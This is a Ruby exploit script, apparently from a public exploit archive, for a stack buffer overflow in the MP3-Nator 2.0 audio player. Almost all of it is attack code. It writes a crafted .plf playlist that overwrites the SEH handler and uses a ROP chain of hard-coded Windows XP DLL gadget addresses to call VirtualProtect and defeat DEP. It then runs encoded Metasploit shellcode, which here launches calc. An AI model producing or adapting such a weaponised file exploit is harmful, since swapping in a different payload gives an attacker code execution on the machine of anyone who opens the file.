MP3-Nator Buffer Overflow SEH-DEP Bypass

`# Exploit Title: Exploit Buffer Overflow MP3-Nator (SEH - DEP BYPASS)  
# Date: 18-11-2010  
# Author: Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com  
# Credit/Bug Found By: C4SS!0 G0M3S  
# Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http://files.brothersoft.com/mp3_audio/players/mp3nator.zip  
# Version: 2.0  
# Tested on: Windows XP SP3 EN - Latest Update (VMWARE FUSION - Version 3.1.1)  
# CVE: N/A  
  
#! /usr/bin/env ruby  
filename = 'crash.plf'  
  
# ./msfpayload windows/exec CMD=calc EXITFUNC=seh R | ./msfencode -e x86/alpha_mixed -b '\x00' -t ruby  
# [*] x86/alpha_mixed succeeded with size 456 (iteration=1)  
shellcode =  
"\x89\xe3\xda\xcf\xd9\x73\xf4\x58\x50\x59\x49\x49\x49\x49" +  
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +  
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +  
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +  
"\x42\x75\x4a\x49\x49\x6c\x4d\x38\x4d\x59\x47\x70\x43\x30" +  
"\x47\x70\x43\x50\x4e\x69\x48\x65\x50\x31\x48\x52\x43\x54" +  
"\x4c\x4b\x51\x42\x46\x50\x4e\x6b\x50\x52\x44\x4c\x4c\x4b" +  
"\x50\x52\x46\x74\x4e\x6b\x51\x62\x45\x78\x46\x6f\x4c\x77" +  
"\x43\x7a\x47\x56\x50\x31\x49\x6f\x45\x61\x49\x50\x4e\x4c" +  
"\x47\x4c\x45\x31\x43\x4c\x47\x72\x44\x6c\x51\x30\x4f\x31" +  
"\x48\x4f\x46\x6d\x43\x31\x49\x57\x4b\x52\x4a\x50\x46\x32" +  
"\x43\x67\x4c\x4b\x46\x32\x46\x70\x4e\x6b\x43\x72\x47\x4c" +  
"\x47\x71\x48\x50\x4c\x4b\x47\x30\x43\x48\x4b\x35\x4b\x70" +  
"\x50\x74\x43\x7a\x47\x71\x4e\x30\x42\x70\x4c\x4b\x51\x58" +  
"\x42\x38\x4c\x4b\x42\x78\x51\x30\x46\x61\x48\x53\x49\x73" +  
"\x47\x4c\x43\x79\x4e\x6b\x44\x74\x4e\x6b\x45\x51\x49\x46" +  
"\x46\x51\x49\x6f\x45\x61\x4b\x70\x4c\x6c\x4f\x31\x48\x4f" +  
"\x46\x6d\x43\x31\x4a\x67\x47\x48\x4d\x30\x50\x75\x48\x74" +  
"\x47\x73\x43\x4d\x4a\x58\x45\x6b\x43\x4d\x47\x54\x42\x55" +  
"\x4b\x52\x50\x58\x4c\x4b\x50\x58\x45\x74\x47\x71\x4e\x33" +  
"\x51\x76\x4e\x6b\x44\x4c\x42\x6b\x4e\x6b\x46\x38\x45\x4c" +  
"\x45\x51\x4e\x33\x4e\x6b\x44\x44\x4c\x4b\x46\x61\x4a\x70" +  
"\x4f\x79\x50\x44\x44\x64\x44\x64\x51\x4b\x43\x6b\x51\x71" +  
"\x43\x69\x50\x5a\x42\x71\x4b\x4f\x4d\x30\x46\x38\x43\x6f" +  
"\x50\x5a\x4c\x4b\x47\x62\x48\x6b\x4f\x76\x43\x6d\x43\x5a" +  
"\x43\x31\x4c\x4d\x4e\x65\x48\x39\x45\x50\x47\x70\x47\x70" +  
"\x46\x30\x42\x48\x46\x51\x4e\x6b\x42\x4f\x4e\x67\x49\x6f" +  
"\x4e\x35\x4d\x6b\x4b\x4e\x46\x6e\x44\x72\x4a\x4a\x50\x68" +  
"\x4c\x66\x4a\x35\x4f\x4d\x4f\x6d\x4b\x4f\x48\x55\x47\x4c" +  
"\x47\x76\x43\x4c\x46\x6a\x4d\x50\x4b\x4b\x4d\x30\x44\x35" +  
"\x45\x55\x4f\x4b\x47\x37\x47\x63\x43\x42\x50\x6f\x51\x7a" +  
"\x45\x50\x42\x73\x4b\x4f\x49\x45\x45\x33\x43\x51\x50\x6c" +  
"\x51\x73\x45\x50\x47\x7a\x41\x41"  
  
junk1 = 'A' * 28  
  
# ROP1  
rop1 = ''  
rop1 << [0x71ABDAC3].pack('V') # PUSH ESP # POP ESI # RETN [Module : WS2_32.dll]  
rop1 << [0x71ABDC56].pack('V') # MOV EAX,ESI # POP ESI # RETN [Module : WS2_32.dll]  
rop1 << "DEAD" # PADDING  
rop1 << [0x1001595E].pack('V') # ADD ESP,20 # RETN - xaudio.dll  
  
# VIRTUALPROTECT PARAMETERS  
params = ''  
params << [0x7C801AD4].pack('V') # VirtualProtect  
params << 'WWWW' # return address [ PARAM #1 ]  
params << 'XXXX' # lpAddress [ PARAM #2 ]  
params << 'YYYY' # Size [ PARAM #3 ]  
params << 'ZZZZ' # flNewProtect [ PARAM #4 ]  
params << [0x5ADA1005].pack('V') # writeable address  
params << 'BEEF' * 2 # PADDING  
  
# ROP2 - [ PARAM #1 ]  
rop2 = ''  
rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN [Module : ole32.dll]  
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]  
rop2 << "BEEF" # PADDING  
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]  
rop2 << 'BEEF' # PADDING  
rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module : RPCRT4.dll]  
rop2 << 'BEEF'  
  
# ROP2 - [ PARAM #2 ]  
rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN [Module : ole32.dll]  
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]  
rop2 << 'BEEF' # PADDING  
rop2 << [0x77157D1D].pack('V') * 4 # INC ESI # RETN [Module : oleaut32.dll]  
rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module : RPCRT4.dll]  
rop2 << 'BEEF'  
  
# rop2 - [ PARAM #3 ]  
rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN [Module : ole32.dll]  
rop2 << [0x77E8559E].pack('V') # XOR EAX,EAX # RETN [Module : RPCRT4.dll]  
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]  
rop2 << 'BEEF' # PADDING  
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]  
rop2 << 'BEEF' # PADDING  
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]  
rop2 << 'BEEF' # PADDING  
rop2 << [0x77157D1D].pack('V') * 4 # INC ESI # RETN [Module : oleaut32.dll]  
rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module : RPCRT4.dll]  
rop2 << 'BEEF'  
  
# rop2 - [ PARAM #4 ]  
rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN [Module : ole32.dll]  
rop2 << [0x77E8559E].pack('V') # XOR EAX,EAX # RETN [Module : RPCRT4.dll]  
rop2 << [0x77C4EC1D].pack('V') # ADD EAX,40 # POP EBP # RETN [Module : msvcrt.dll]  
rop2 << 'BEEF' # PADDING  
rop2 << [0x77157D1D].pack('V') * 4 # INC ESI # RETN [Module : oleaut32.dll]  
rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module : RPCRT4.dll]  
rop2 << 'BEEF'  
  
# POINT ESP TO VIRTUALPROTECT  
rop2 << [0x7475B960].pack('V') # XCHG EAX,ESP # RETN [Module : MSCTF.dll]  
nops = "\x90" * 310  
  
junk1 = junk1 + rop1 + params + rop2 + nops + shellcode + 'A' * (4112 - (junk1 + rop1 + params + rop2 + nops + shellcode).length)  
  
seh = [0x10019C35].pack('V') # ADD ESP,41C # RETN - xaudio.dll  
junk2 = 'C' * (10000 - (junk1 + seh).length)  
xploit = junk1 + seh + junk2  
  
File.open(filename,'w') do |fd|  
fd.write xploit  
puts "file size : #{xploit.length.to_s}"  
end  
  
`